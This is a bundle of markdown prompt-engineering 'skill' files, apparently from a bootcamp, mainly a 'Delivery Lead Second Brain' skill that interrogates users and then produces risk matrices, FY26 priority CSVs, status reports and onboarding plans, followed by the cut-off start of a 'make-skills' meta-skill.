A: The interrogation phase ensures the code respects your team's conventions, matches your architecture, and solves the actual problem — not a generic version.
**Q: Can I use this for legacy code with no tests?**
A: Yes. The interrogation will help you understand what's there and create a safe refactoring plan.
**Q: What if the skill suggests something that violates my team's standards?**
A: Tell it during interrogation: "Our error handling uses exceptions, not result types." It will adjust.
---
## References
- **ReAct Pattern**: Yao et al. (2022) "ReAct: Synergizing Reasoning and Acting in Language Models"
- **Chain of Thought**: Wei et al. (2022) "Chain-of-Thought Prompting Elicits Reasoning in Large Language Models"
- **Few-shot Learning**: Brown et al. (2020) "Language Models are Few-Shot Learners"
- **Prompt Patterns**: White et al. (2023) "A Prompt Pattern Catalog to Enhance Prompt Engineering"
---
**Version**: 1.0
**Last Updated**: 2026-03-18
**For**: Joey's Prompt Engineering Bootcamp v2
---
# skills-dl-second-brain.md
# https://jrlopez.dev/p/skills-dl-second-brain.md
---
name: dl-second-brain
description: Delivery Lead second brain — interrogation-driven priority building, team scaling, and client delivery using systematic patterns
version: 1.0
---
# Delivery Lead Second Brain Skill
## Overview
The **Delivery Lead Second Brain** is an expert assistant that guides delivery leaders through complex project challenges using three bootcamp intuitions:
1. **Context is everything** — Gathers rich context about team, client, project, and business before generating strategies
2. **Structure gets rewarded** — Uses structured output (priorities, risk matrices, status reports) instead of loose narratives
3. **You are the retrieval system** — Acts as an automated knowledge assembly system for project data and team intelligence
This skill enables delivery leaders to tackle:
- ✅ FY26 Priority Building (with ABCD reflections and system-ready CSV output)
- ✅ Team Scaling & Knowledge Capture (onboarding, ADRs, knowledge bases)
- ✅ Client Status Reporting (steering committee materials, risk escalations)
- ✅ Delivery Risk Assessment (systematic risk identification and mitigation)
---
## Key Capabilities
### 1. Interrogation-Driven Workflow
Gathers structured context before generating strategies using a **deep-dive interview** adapted for delivery leaders:
- **Team Context**: Size, composition, skill matrix, remote/collocated mix
- **Project Scope**: Budget, timeline, deliverables, success metrics
- **Client Dynamics**: Stakeholder map, decision-making patterns, relationship health
- **Delivery Methodology**: Agile/waterfall/hybrid, ceremonies, cadence
- **Risk Landscape**: Known risks, escalation paths, dependencies
- **Organizational Context**: Portfolio context, competing initiatives, resource constraints
### 2. ReAct Pattern for Delivery
Generates plans and assessments with **THINK → ACT → OBSERVE** annotations:
```
THINK: What's the constraint here? (Analysis phase)
ACT: Here's the recommended action (Decision)
OBSERVE: How do we verify success? (Metrics/monitoring)
```
### 3. Structured Output Formats
- **FY26 Priorities**: CSV format with ABCD reflections and system mapping
- **Risk Assessment Matrix**: Impact/probability with mitigation strategies
- **Status Reports**: RAG status, milestone tracking, escalation summary
- **Team Knowledge Base**: ADR-format team standards and AI workflow documentation
- **Onboarding Plans**: Phased ramp-up with knowledge checkpoints
---
## Usage Scenarios
Choose the scenario matching your current deliverable:
### **Scenario A: FY26 Priority Building**
*Creating performance priorities with ABCD reflections and business alignment*
**When to use**: "I need to build FY26 priorities for my team/program"
**What you'll get**: 3-5 priorities in CSV format (system-ready) with ABCD reflections, metrics, and resource mapping
### **Scenario B: Team Scaling & Knowledge Capture**
*Onboarding plans, ADRs, team knowledge bases for AI workflows*
**When to use**: "I'm onboarding new people or need to codify team knowledge"
**What you'll get**: Phased onboarding plan, ADR templates, knowledge-base structure, AI workflow documentation
### **Scenario C: Client Status Reporting**
*Weekly/monthly status reports, steering committee materials, risk escalations*
**When to use**: "I need to report project health to client/leadership"
**What you'll get**: RAG status summary, milestone tracker, risk escalation, client asks, next-week plan
### **Scenario D: Delivery Risk Assessment**
*Systematic risk identification, impact analysis, mitigation planning*
**When to use**: "I need to systematically identify and mitigate delivery risks"
**What you'll get**: Risk matrix (impact/probability), mitigation strategies, owner/timeline, monitoring approach
---
## Structured Interrogation Framework
The skill will ask you these questions to build context:
### Phase 1: Team & Project Context (6-8 questions)
1. **Team Composition**: How many people? Roles? Remote/collocated? Distributed across time zones?
2. **Project Budget**: Total contract value? Burn rate? Contingency? Budget headroom?
3. **Project Scope**: What are the 3-5 main deliverables? Timeline to completion?
4. **Success Metrics**: How does the client measure success? What are the KPIs?
5. **Delivery Methodology**: Agile (which framework?), waterfall, hybrid? Sprint length?
6. **Current Phase**: Discovery, build, testing, launch, sustain?
### Phase 2: Client & Stakeholder Dynamics (4-5 questions)
7. **Client Stakeholder Map**: Who makes decisions? Decision-making style? (Data-driven, political, consensus?)
8. **Relationship Health**: Client satisfaction level? Any tensions or escalations?
9. **Client Team**: Are they embedded? Do they have capacity to review/approve?
10. **Change Management**: How resistant is the org to the change you're delivering?
### Phase 3: Risk & Dependencies (3-4 questions)
11. **Known Risks**: What keeps you up at night? Top 3 risk items?
12. **Dependencies**: What's blocking progress? External dependencies? Other workstreams?
13. **Escalation Paths**: Who do you escalate to? What's the decision timeline?
14. **Resource Constraints**: Are you resource-constrained? Skills gaps? Competing priorities?
### Phase 4: Organizational Context (2-3 questions)
15. **Portfolio Context**: How does this fit into broader program/portfolio? Interdependencies?
16. **Organizational Readiness**: Is the org ready for this change? Training/change management needed?
17. **Tribal Knowledge**: What does every DL wish they knew about this type of project?
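The four phases above can be encoded as plain data that the skill walks in order. A minimal Python sketch — the question wording is abbreviated from the list above, and `ask` is a stand-in for prompting the delivery lead:

```python
# Hypothetical encoding of the four interrogation phases as plain data.
PHASES = {
    "Team & Project Context": [
        "Team composition?", "Project budget?", "Project scope?",
        "Success metrics?", "Delivery methodology?", "Current phase?",
    ],
    "Client & Stakeholder Dynamics": [
        "Stakeholder map?", "Relationship health?", "Client team capacity?",
        "Change management readiness?",
    ],
    "Risk & Dependencies": [
        "Known risks?", "Dependencies?", "Escalation paths?", "Resource constraints?",
    ],
    "Organizational Context": [
        "Portfolio context?", "Organizational readiness?", "Tribal knowledge?",
    ],
}

def interrogate(ask):
    """Walk every phase in order and assemble answers into structured context."""
    return {phase: {q: ask(q) for q in questions}
            for phase, questions in PHASES.items()}

# Usage: `ask` would prompt the delivery lead; here a stub records each question.
context = interrogate(lambda q: f"[answer to: {q}]")
```

Keeping the questions as data rather than prose is what makes the interrogation repeatable across projects.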
---
## Output Format Specification
### 1. FY26 Priority Building with ABCD
```csv
Priority,Action,Behavior,Context,Delivered,Owner,Timeline,Metrics,Notes
"Q1 Platform Foundation","Implement core platform infrastructure","Complete to 100% test coverage + peer review","Supports all downstream Q2/Q3 features","Production-ready, monitored, documented","[Name]","Jan-Feb","Uptime 99.9%, zero critical defects","Blocks 3 features"
"Q2 Client Portal","Build self-service client dashboard","All client workflows automated","Reduces support load by 40%","Live with 5 pilot clients","[Name]","Feb-Mar","Time-to-insight < 2min, 95% adoption","Early adopter feedback positive"
"Q3 Integration Suite","Connect to 3 third-party systems","All integrations tested and documented","Eliminates manual data entry","Scheduled for Apr launch","[Name]","Mar-May","Data sync < 1hr, zero manual errors","Partner APIs being finalized"
```
**Format notes:**
- Action: What you're doing
- Behavior: How it's done (quality, coverage, standards)
- Context: Why it matters (business impact, dependencies)
- Delivered: What does success look like?
- Owner: Who owns it?
- Timeline: When?
- Metrics: How do you measure?
- Notes: Dependencies, assumptions, risks
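Because the CSV is meant to be system-ready, it is worth checking that every row carries the full ABCD column set before loading it anywhere. A minimal sketch using Python's standard `csv` module — the `REQUIRED` list mirrors the header above, but the validation rule itself is an assumption, not part of the skill:

```python
import csv
import io

REQUIRED = ["Priority", "Action", "Behavior", "Context", "Delivered",
            "Owner", "Timeline", "Metrics", "Notes"]

def validate_priorities(csv_text):
    """Parse a priorities CSV, failing fast if any ABCD column is missing."""
    reader = csv.DictReader(io.StringIO(csv_text))
    missing = [c for c in REQUIRED if c not in (reader.fieldnames or [])]
    if missing:
        raise ValueError(f"missing columns: {missing}")
    # Keep only rows that contain at least one non-empty cell.
    return [row for row in reader if any(row.values())]

sample = '''Priority,Action,Behavior,Context,Delivered,Owner,Timeline,Metrics,Notes
"Q1 Platform Foundation","Implement core infra","100% coverage","Unblocks Q2","Production-ready","[Name]","Jan-Feb","Uptime 99.9%","Blocks 3 features"
'''
rows = validate_priorities(sample)
# rows[0]["Priority"] == "Q1 Platform Foundation"
```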
### 2. Risk Assessment Matrix with Mitigation
```
## Delivery Risk Assessment: [Project Name]
### Phase 1: Risk Identification
**THINK**: What could go wrong? (Probability × Impact)
- [ ] Technical risks (architecture, complexity, dependencies)
- [ ] Resource risks (skills gaps, availability, turnover)
- [ ] Client risks (stakeholder alignment, change readiness, decision delays)
- [ ] Organizational risks (portfolio conflicts, resource competition, org changes)
- [ ] External risks (vendor delays, regulatory, market)
**ACT**: Risk Matrix
| Risk | Probability | Impact | Score | Mitigation | Owner | Timeline |
|------|-------------|--------|-------|-----------|-------|----------|
| Key vendor API delay | Medium | High | 6 | Establish contingency API layer | [Name] | Week 1 |
| Client lacks technical resources | High | Medium | 6 | Provide technical partner for review | [Name] | Week 1-2 |
| Scope creep from stakeholder requests | High | High | 9 | Establish change control board + baseline | [Name] | Immediate |
| Team capacity for testing phase | Medium | High | 6 | Hire contract QA for weeks 8-12 | [Name] | Week 4 |
**OBSERVE**: Verify mitigation in place:
- [ ] Risk owner assigned to each
- [ ] Mitigation plan has clear first step
- [ ] Timeline is realistic
- [ ] Owner has autonomy to execute
```
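The Score column follows the Probability × Impact convention. One common encoding maps Low/Medium/High to 1/2/3, for a maximum score of 9 — a sketch under that assumption (it is illustrative; a team using a 1-5 scale would substitute its own mapping):

```python
LEVEL = {"Low": 1, "Medium": 2, "High": 3}

def risk_score(probability, impact):
    """Score = Probability x Impact on an ordinal 1-3 scale (max 9)."""
    return LEVEL[probability] * LEVEL[impact]

def rank_risks(risks):
    """Sort risks so the highest Probability x Impact lands on top."""
    return sorted(risks,
                  key=lambda r: risk_score(r["probability"], r["impact"]),
                  reverse=True)

risks = rank_risks([
    {"name": "Key vendor API delay", "probability": "Medium", "impact": "High"},
    {"name": "Scope creep", "probability": "High", "impact": "High"},
])
# risks[0]["name"] == "Scope creep"  (score 9 beats 6)
```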
### 3. Client Status Report Template
```markdown
## Weekly Status Report: [Project Name]
**Week of**: [Date]
**Reporting to**: [Stakeholder]
**Overall Status**: 🟢 GREEN | 🟡 YELLOW | 🔴 RED
### 1. Milestone Tracker (RAG Status)
| Deliverable | Target Date | Status | Progress | Notes |
|-------------|------------|--------|----------|-------|
| Architecture Approval | Feb 15 | 🟢 On track | 100% | Steering approved Feb 14 |
| Platform Build Phase 1 | Mar 31 | 🟡 At risk | 65% | API delays pushing 1 week |
| Beta Testing | Apr 15 | 🟡 At risk | 20% | Waiting on client QA resources |
### 2. Key Achievements This Week
- ✅ Completed architecture review (all 14 stakeholder comments resolved)
- ✅ Hired contract QA resource (starts Monday)
- ✅ Client approved data migration approach
### 3. Risks & Escalations
**🔴 ESCALATION NEEDED**: Client API vendor delay pushing Phase 1 completion by 1 week
- **Impact**: Beta testing may slip from Apr 15 → Apr 22
- **Mitigation in progress**: Building contingency API wrapper (ETA Friday)
- **Escalation**: Requesting steering committee approval for 1-week schedule extension
### 4. Next Week's Plan
- [ ] Resolve final 3 architecture comments
- [ ] Begin platform build (Week 1 of 8)
- [ ] Schedule client data migration workshop
- [ ] Hire additional contract developer (capacity planning)
### 5. Client Asks / Open Items
| Ask | Owner | Status | Timeline |
|-----|-------|--------|----------|
| Training schedule for Phase 2 | [Client] | Pending | Due by Feb 28 |
| Technical resource for integration testing | [Client] | In progress | Starting Mar 1 |
| Approval for go-live cutover plan | [Client] | Not started | Need by Apr 1 |
```
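One way to derive the Overall Status line from the milestone table is a worst-status roll-up. This rule is an assumption for illustration — in practice a DL may hold the overall status green when mitigations are in flight:

```python
def overall_status(milestones):
    """Roll milestone RAG statuses up: any RED -> RED, else any YELLOW -> YELLOW."""
    statuses = [m["status"] for m in milestones]
    if "RED" in statuses:
        return "RED"
    if "YELLOW" in statuses:
        return "YELLOW"
    return "GREEN"

# Mirrors the milestone tracker in the template above.
milestones = [
    {"name": "Architecture Approval", "status": "GREEN"},
    {"name": "Platform Build Phase 1", "status": "YELLOW"},
    {"name": "Beta Testing", "status": "YELLOW"},
]
# overall_status(milestones) == "YELLOW"
```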
### 4. Team Scaling Onboarding Plan
```markdown
## Onboarding Plan: [New Team Member Name]
### Phase 1: Week 1 - Foundation (Context Assembly)
**THINK**: What must they understand in first 7 days?
- Project mission, scope, success criteria
- Team structure and roles
- Client context and stakeholder map
- Delivery methodology and ceremonies
- Current phase and blockers
**ACT**: Day-by-day
| Day | Activity | Owner | Duration |
|-----|----------|-------|----------|
| 1 | Intro to project + org context | [DL] | 2h |
| 1 | Meet core team + role clarity | [PM] | 1h |
| 2 | Client context + stakeholder map | [Account exec] | 1.5h |
| 2 | Current phase deep-dive + blockers | [Tech lead] | 2h |
| 3 | Documentation review (project plan, ADRs, design docs) | Self-directed | 3h |
| 3 | Q&A with delivery team | [DL] | 1h |
| 4-5 | Shadow team ceremonies (standups, planning, client calls) | [Team] | 5h |
**OBSERVE**: Phase 1 checkpoint
- [ ] Can articulate project goal in 2 sentences
- [ ] Knows all core team members + roles
- [ ] Understands current phase and top 3 blockers
- [ ] Attended at least 3 ceremonies
### Phase 2: Week 2-3 - Ramp-Up (Role-Specific)
**Task**: [Role-specific onboarding based on their position]
### Phase 3: Week 4-6 - Contribution (First Real Task)
**Task**: Assigned first "real" task with mentor pairing
- Task has clear success criteria
- Mentor reviews work before integration
- Increases autonomy over time
### Knowledge Base Verification
- [ ] Reviewed Project Charter
- [ ] Read technical ADRs
- [ ] Understood team conventions (naming, code review, etc.)
- [ ] Knows escalation path for blockers
- [ ] Has access to all tools (Jira, docs, etc.)
- [ ] Can execute a task with mentor review
```
---
## Using the Skill: Step-by-Step Workflow
### Step 1: Choose Your Scenario
```
"I need to build FY26 priorities for Q1 and Q2"
→ Scenario A (Priority Building)
"I'm onboarding 3 new engineers and want to capture team knowledge"
→ Scenario B (Team Scaling)
"Time to report project health to the steering committee"
→ Scenario C (Status Reporting)
"Too many risks, need a systematic approach to identify and track them"
→ Scenario D (Risk Assessment)
```
### Step 2: Let the Skill Interrogate
The skill will ask 14-17 questions. **Answer fully** — this is where context richness happens.
Example interrogation flow:
```
Q1: Team composition?
A: 8 people - 1 DL (me), 1 PM, 4 engineers, 1 QA, 1 data analyst.
Remote across PST, CST, EST. No overlap between CST/EST and PST team.
Q2: Project budget?
A: $2.3M total contract, Q1-Q3 delivery. About $180K/month burn rate.
20% contingency = $460K left. Not burning through it yet.
Q3: Main deliverables?
A: (1) Data platform foundation, (2) Client portal, (3) Integration suite,
(4) Training program, (5) Go-live support
Q4: Success metrics?
A: Client tracks three things: time-to-insight (target < 2 min),
data freshness (< 1 hour), and adoption (target 80% of users in 90 days)
Q5: Delivery methodology?
A: Agile, 2-week sprints. Ceremonies: daily standup, sprint planning,
retrospectives, steering committee every 2 weeks
Q6: Current phase?
A: In detailed design (weeks 3-4 of 12-week delivery). Just completed
architecture review with client and internal stakeholders.
[... continues through all questions ...]
```
### Step 3: Review Generated Output
The skill will generate:
- ✅ Structured priorities in CSV (Scenario A)
- ✅ Onboarding plan + ADR template (Scenario B)
- ✅ Status report ready to send to client (Scenario C)
- ✅ Risk matrix with mitigation plans (Scenario D)
### Step 4: Execute with Confidence
Use the generated output as:
- **For priorities**: Load into your planning or tracking system, share with the team, measure against metrics
- **For onboarding**: Follow day-by-day plan, use checkpoints to verify ramp-up
- **For status**: Send to client/leadership with no edits (it's already structured)
- **For risks**: Monitor mitigation progress weekly, escalate if probability/impact changes
---
## Design Principles
### Principle 1: Context Over Guessing
**Never generate a strategy without understanding:**
- What problem are we solving?
- What are the hard constraints?
- What does the client really value?
- What could derail this?
The interrogation phase ensures we have rich context before any recommendations.
### Principle 2: Structure Over Narrative
**Always output:**
- Matrices and tables (not paragraphs)
- CSV export (not "here's a summary")
- Checklists (not suggestions)
- Metrics and owners (not vague goals)
Bootcamp intuition: Structure gets rewarded.
### Principle 3: Verification by Default
**Every strategy includes:**
- Why we're recommending it (THINK)
- The specific action (ACT)
- How to verify it's working (OBSERVE + metrics)
ReAct pattern enforces accountability.
### Principle 4: Organizational Awareness
**Always respect:**
- Client decision-making style
- Team capacity and skill gaps
- Portfolio and competing priorities
- Organizational change readiness
This is where interrogation pays dividends.
---
## Example: Complete Workflow
### Scenario: FY26 Priority Building for $2.3M Digital Transformation Project
**You say:**
```
I'm the Delivery Lead on a $2.3M digital transformation project for a financial services client.
I need to create FY26 priorities that align with our quarterly planning and map to ABCD.
The team is 8 people, we're in design phase, and I need to present this to steering next week.
```
**Skill interrogates (Phase 1: Team & Project Context):**
```
Q1: Team composition?
→ "8 people: 1 DL, 1 PM, 4 engineers, 1 QA, 1 analyst. Distributed PST/CST/EST."
Q2: Project budget?
→ "$2.3M total, $180K/month burn, 20% contingency remaining ($460K)."
Q3: Main deliverables?
→ "(1) Data platform foundation, (2) Client portal, (3) Integrations,
(4) Training, (5) Go-live support. 12-week timeline total."
Q4: Success metrics?
→ "Client cares about: time-to-insight < 2 min, data freshness < 1 hour,
adoption 80% in 90 days post-launch."
Q5: Delivery methodology?
→ "Agile, 2-week sprints. Daily standups, sprint planning, retros,
steering every 2 weeks."
Q6: Current phase?
→ "Week 3-4 of 12. Just completed architecture review. All stakeholders approved design."
```
**Skill interrogates (Phase 2: Client & Stakeholder Dynamics):**
```
Q7: Stakeholder map?
→ "Executive sponsor (SVP Finance), two program managers, three power users
from operations, one IT director. Sponsor is data-driven, PMs are collaborative,
power users are skeptical about change."
Q8: Relationship health?
→ "Good. Sponsor is engaged, PMs are responsive. Power users are worried about
adoption but participating actively."
Q9: Client technical resources?
→ "They have 1 dedicated technical person for reviews + integration testing.
OK but not deep."
Q10: Change management readiness?
→ "Medium. They've done one prior digital transformation (3 years ago, was painful).
Training budget approved. Need champions in each department."
```
**Skill interrogates (Phase 3: Risk & Dependencies):**
```
Q11: Top risks?
→ "(1) Their legacy system has data quality issues we're discovering late
(Q2 risk). (2) One critical engineer might leave in Q2 (personal situation).
(3) Adoption risk if training isn't top-notch."
Q12: Dependencies?
→ "Waiting on their data team for schema finalization (should be 2 weeks).
We handle everything else. No other workstreams blocking us."
Q13: Escalation paths?
→ "Steering committee every 2 weeks. Sponsor makes final calls.
Any schedule impact needs sponsor approval."
Q14: Resource constraints?
→ "We're not constrained (staffed fully for this phase). Client is the constraint.
Their power users will be busy with quarterly closing in late Feb."
```
**Skill interrogates (Phase 4: Organizational Context):**
```
Q15: Portfolio context?
→ "This is one of 3 concurrent projects for our practice. Others are not dependent.
This is the flagship project for the client relationship."
Q16: Org readiness for change?
→ "They've announced the initiative but haven't trained people yet.
We're responsible for training in Phase 3. Change management is light."
Q17: What should we know?
→ "The previous transformation failed on adoption. This client doesn't trust new systems.
User acceptance is the real risk, not technical delivery."
```
**Skill generates: FY26 Priorities CSV**
```csv
Priority,Action,Behavior,Context,Delivered,Owner,Timeline,Metrics,Notes
"Q1 Foundation: Data Platform Build","Engineer data ingestion pipeline, core analytics, reporting APIs","Code reviewed to team standards, 95% test coverage, all architecture ADRs documented, client schema finalized and validated","Unblocks all downstream work. Client has painful manual processes today. This is the 'why' for the project.","Production-ready data pipeline, ingesting 3 source systems, 50+ reports available","[Tech Lead]","Jan-Feb (9 weeks remaining)","Pipeline latency < 15min, data freshness < 1h, zero failed ingests over 2 weeks","Depends on client data team schema work. Schedule risk if slips. Mitigation: our team building interim schema."
"Q1 Foundation: Client Portal MVP","Build self-service client dashboard with role-based views, export capability, real-time KPI dashboards","Full end-to-end tested, accessibility compliant, 2 rounds of user feedback integrated, training materials drafted","Client power users will use this daily. Adoption depends on UX quality. This is proof-of-concept for the broader change.","Live portal with 5 core reports, 3 user roles, < 2s load time, 95% uptime","[PM + 2 eng]","Jan-Feb","Page load < 2s, adoption 40% by Feb 28, NPS > 7 from power user testing","Need user feedback loop starting week 4. Risk: poor UX adoption if not tested with real users early."
"Q1-Q2 Integration: Legacy System Connectors","Build adapters for 3 critical legacy systems, handle ETL complexity, document data mappings","All adapters unit tested, integration tested with production-like data, data reconciliation manual spot-checks 100% passed, runbooks written","Client has painful manual exports today. Automating these saves 200 hours/month. Quick wins build momentum.","All 3 adapters live and validated, automating 4 manual processes","[Data eng]","Feb-Mar (5 weeks)","Zero manual data entry errors, 200+ hours/month automation, audit trail complete","Data quality issues emerging (legacy system has ~10% bad records). Mitigation: data cleansing ADR and strategy by week 5."
"Q2 Adoption: Training Program & Change Management","Develop train-the-trainer program, facilitate dept-specific training, identify and empower champions in each area","Train-the-trainer pilot with 3 power users, training materials > 90% positive feedback, at least 1 champion per department trained and ready","The previous transformation failed on adoption. This is existential risk. Real focus here. Need user buy-in.","100% of target users trained, 3+ champions active per department, readiness assessment passed","[PM + 2 trainers]","Feb-Mar (launching Mar 1)","Training completion 90%, champion engagement > 80%, user readiness survey >= 7/10","Schedule: can't start until portal is stable (end of Feb). Mitigation: dry-run materials now with team."
"Q3 Delivery: Go-Live & Post-Launch Support","Orchestrate cutover, monitor production launch for 30 days, handle day-1 issues, measure business impact","All runbooks tested in staging, incidents < 2h resolution, support team briefed and on standby, success metrics dashboard live","This is the finish line. Quality here determines relationship health. Need flawless execution.","Live system, 90%+ adoption in 30 days, business metrics improving (time-to-insight target met)","[DL + full team]","Mar (launches week 12)","Uptime 99.9%, incident resolution < 2h, NPS post-launch >= 8, adoption 80% by week 4","Risk: if training didn't land, adoption will be low. Mitigation: have support team ready with 24/7 coverage week 1."
```
**Skill generates: Strategic Context for Steering**
```
## FY26 Narrative for Steering Committee
### Program Health
🟢 **GREEN** — On track for Q1 foundation, Q2 adoption, Q3 launch.
### Why These Priorities?
**Sequencing is critical:**
1. **Q1 Foundation** (8 weeks): Build platform + portal. This is the hardest technical work. Must finish before clients use it.
2. **Q2 Adoption** (4 weeks): Train, empower champions, build trust. This is the real risk. The previous transformation failed here.
3. **Q3 Launch** (4 weeks): Go-live with full team support. Measure impact.
### Biggest Risks & Mitigations
| Risk | Mitigation | Owner |
|------|-----------|-------|
| Data quality issues in legacy system | Data cleansing strategy by Feb, staged ingestion | Tech lead |
| Key engineer departure in Q2 | Document critical knowledge now, hire contractor backup | DL |
| Adoption fails (like last time) | Invest heavily in training + champions, measure readiness | PM |
| Client power users not engaged | Early UX testing with real users, feedback loop | PM |
### What We Need From Client
- [ ] Data team schema finalization (by Feb 1)
- [ ] 1 dedicated technical resource for integration testing
- [ ] Commitment to 3+ champions per department for training
- [ ] Go-live cutover plan approval by Mar 15
```
**Skill generates: Verification Checklist**
```markdown
## FY26 Execution Checklist
### Q1 Foundation (Weeks 1-8)
- [ ] Architecture approved by steering (done)
- [ ] Data pipeline ingesting all 3 sources
- [ ] Portal MVP live with 5 core reports
- [ ] User feedback collected and integrated
- [ ] Training materials drafted and ready
- [ ] Integration roadmap for 3 legacy systems finalized
### Q2 Adoption (Weeks 9-12)
- [ ] Train-the-trainer pilot with power users
- [ ] Department-specific training sessions scheduled
- [ ] Champions identified and briefed
- [ ] Readiness survey shows >= 7/10
- [ ] Legacy system integrations live and tested
### Q3 Launch (Weeks 13-16)
- [ ] Go-live cutover plan approved
- [ ] Support team on standby (24/7)
- [ ] Business metrics dashboard live
- [ ] Day-1 incidents resolved < 2 hours
- [ ] Post-launch NPS >= 8
### Health Metrics to Track Weekly
- [ ] Story velocity on track
- [ ] Defect backlog < 20
- [ ] Client satisfaction (steering feedback)
- [ ] Team capacity (no burnout)
- [ ] Risk register (top 5 risks monitored)
```
---
## Advanced Usage: Combining with Bootcamp Patterns
### Using with Spec-Driven Development
Create specs for each priority before implementation:
```
Scenario A → CSV priorities
+ Spec-driven dev → One-page spec per priority
+ ReAct planning → Implementation phases with THINK/ACT/OBSERVE
```
### Using with Persona Patterns
Different roles, different perspectives:
```
Career Coach Persona: "Here's how this builds your career narrative"
Delivery Expert Persona: "Here's how to execute flawlessly"
Client Advocate Persona: "Here's why this matters to the business"
```
### Using with Few-Shot Learning
Learn from past projects:
```
Previous project: $1.8M, 10 weeks, 95% on-time
This project: $2.3M, 12 weeks, similar team size
Pattern: Adoption was bottleneck last time
Recommendation: Front-load Q2 adoption work
```
---
## When to Use This Skill vs. Email/Meetings
| Task | Use Email/Meetings | Use Skill |
|------|-------------------|-----------|
| Update team on daily status | ✅ Standup | ❌ Overkill |
| Quick schedule change | ✅ Slack | ❌ Overkill |
| **Build FY26 priorities** | ❌ Messy | ✅ **This skill** |
| **Assess delivery risks systematically** | ❌ Missed items | ✅ **This skill** |
| **Create status report for steering** | ❌ Takes 2 hours | ✅ **This skill** |
| **Onboard new team member** | ❌ Inconsistent | ✅ **This skill** |
| **Build team knowledge base** | ❌ Nobody maintains it | ✅ **This skill** |
| **Present client situation analysis** | ❌ Just your gut | ✅ **This skill** |
---
## Bootcamp Integration
### For Facilitators
Use this skill in **Session 3: Delivery Patterns** when discussing:
- ReAct pattern for delivery decisions
- Real-world delivery scenarios
- Systematic problem-solving for leadership
### For Participants (Role-Fork Exercise)
**Use this skill when:**
- You're the "Delivery Lead" in a role-fork scenario
- You need to create priorities or status reports
- You're building team knowledge or onboarding people
- You're systematically assessing risks
**Expected outcome:**
- Understand how structured interrogation builds strategic context
- See ReAct pattern in action with delivery decisions
- Generate production-ready priorities/reports that impress stakeholders
---
## FAQ
**Q: Will this skill make all my delivery decisions for me?**
A: No. It structures your thinking and generates output. You make the final calls based on organizational context it can't know.
**Q: What if I'm not sure about the answers to interrogation questions?**
A: That's useful signal! It means you need to gather that context. The skill will help you identify what you're missing.
**Q: How is this different from just asking an LLM for advice?**
A: The interrogation phase ensures the recommendations fit YOUR project, client, and team — not a generic best practice that doesn't apply.
**Q: Can I use this for different delivery methodologies?**
A: Yes. Tell the skill your methodology (Agile, waterfall, hybrid, Scrum, Kanban, etc.) in Phase 1, and it adapts.
**Q: What if my client doesn't fit the patterns in this skill?**
A: Tell it during interrogation: "Our client makes decisions by consensus, very slow." It will adjust the risk assessment and recommendations.
**Q: I don't have time for a full interrogation. Can we skip questions?**
A: You could, but interrogation is where the value happens. Even 5 minutes answering key questions beats 30 minutes guessing.
**Q: Can I use this for a subcontractor or partner delivery?**
A: Yes. The framework applies to any delivery context. Just adjust the stakeholder map in Phase 2 interrogation.
---
## Real Example Outputs
### Output 1: FY26 Priorities CSV (Ready to Load into your system)
```
Priority,Action,Behavior,Context,Delivered,Owner,Timeline,Metrics
"Platform Foundation","Engineer core data pipeline","95% test coverage, architecture reviewed, client schema approved","Unblocks Q2 work, client has painful manual processes","Production-ready ingestion for 3 systems","[Tech Lead]","Jan-Feb","Latency <15min, uptime 99.9%"
```
### Output 2: Risk Matrix (Ready to Share with Steering)
```
| Risk | Probability | Impact | Mitigation | Owner | Status |
|------|-------------|--------|-----------|-------|--------|
| Data quality issues | High | High | Cleansing strategy by Feb 1 | [Name] | In progress |
| Key engineer leaves | Medium | High | Document knowledge, hire backup | [Name] | Monitoring |
| Adoption fails | Medium | Critical | Champions + training focus | [PM] | Active |
```
### Output 3: Status Report (Ready to Send to Client)
```
## Weekly Status Report
**Project**: Digital Transformation
**Overall Status**: 🟢 GREEN
**Milestone Progress**: [Table showing on-time delivery]
**Escalations**: [List of items needing client action]
**Next Week**: [Specific, actionable plan]
```
---
## References
- **ReAct Pattern**: Yao et al. (2022) "ReAct: Synergizing Reasoning and Acting in Language Models"
- **Persona Pattern**: White et al. (2023) "A Prompt Pattern Catalog to Enhance Prompt Engineering"
- **Few-shot Learning**: Brown et al. (2020) "Language Models are Few-Shot Learners"
- **Delivery Leadership**: Sutherland (2014) "Scrum: The Art of Doing Twice the Work in Half the Time"
- **Risk Management**: PMBOK Guide (2021) Project Management Institute
---
**Version**: 1.0
**Last Updated**: 2026-03-18
**For**: Joey's Prompt Engineering Bootcamp v2 — Delivery Lead Track
---
# skills-make-skills.md
# https://jrlopez.dev/p/skills-make-skills.md
---
name: make-skills
description: Meta-skill capstone — build your own interrogation-driven AI skill for any repeated task
version: 1.0
---
# Make-Skills Meta-Skill (Capstone)
## Overview
The **Make-Skills** skill is the capstone of Joey's Prompt Engineering Bootcamp v2. It's the moment when participants stop USING skills and start CREATING them.
This skill answers the fundamental question: **"How do you turn your repeated work into a skill that scales?"**
Using three interrogation phases, you'll discover the pattern hidden in your weekly tasks, extract it into a structured skill, and generate a production-ready skill file that you can save and use immediately.
The skill demonstrates all three bootcamp intuitions at the **meta level**:
1. **Context is everything** → The interrogation gathers rich context about YOUR task, YOUR constraints, YOUR audience
2. **Structure gets rewarded** → The output is a properly formatted skill file that an AI (or you) can read and execute
3. **You are the retrieval system** → The skill you build BECOMES a retrieval system for that task — it asks the right questions and assembles answers into structured context
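The three intuitions above can be sketched as code. This is an illustrative toy, not a real skill runtime: the function names (`retrieve`, `augment`, `generate`) and the question list are assumptions chosen to mirror the retrieval → augmentation → generation framing.

```python
# A skill as a three-step RAG loop (toy sketch).

QUESTIONS = [
    "What task do you repeat at least weekly?",
    "What information do you need before you start?",
    "Who uses what you create?",
]

def retrieve(answers: dict[str, str]) -> dict[str, str]:
    """Retrieval: the interrogation pulls relevant context from the user."""
    return {q: answers[q] for q in QUESTIONS}

def augment(context: dict[str, str]) -> str:
    """Augmentation: answers get organized into structured context."""
    return "\n".join(f"- {q}\n  {a}" for q, a in context.items())

def generate(structured: str) -> str:
    """Generation: structured context becomes the prompt an AI completes."""
    return f"Using this context, produce the output:\n{structured}"

answers = {
    QUESTIONS[0]: "I create test plans for new features",
    QUESTIONS[1]: "Feature spec, API contracts, test data",
    QUESTIONS[2]: "QA team, dev team, project manager",
}
prompt = generate(augment(retrieve(answers)))
print(prompt)
```

Swap the question list and the output template and the same loop describes any skill in this document.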
---
## The Capstone Reveal
After you generate your first skill, the skill includes a **reflection section** that shows you what you just built:
> Look at what you just created:
>
> - It **ASKS questions** → that's retrieval (gathering relevant context)
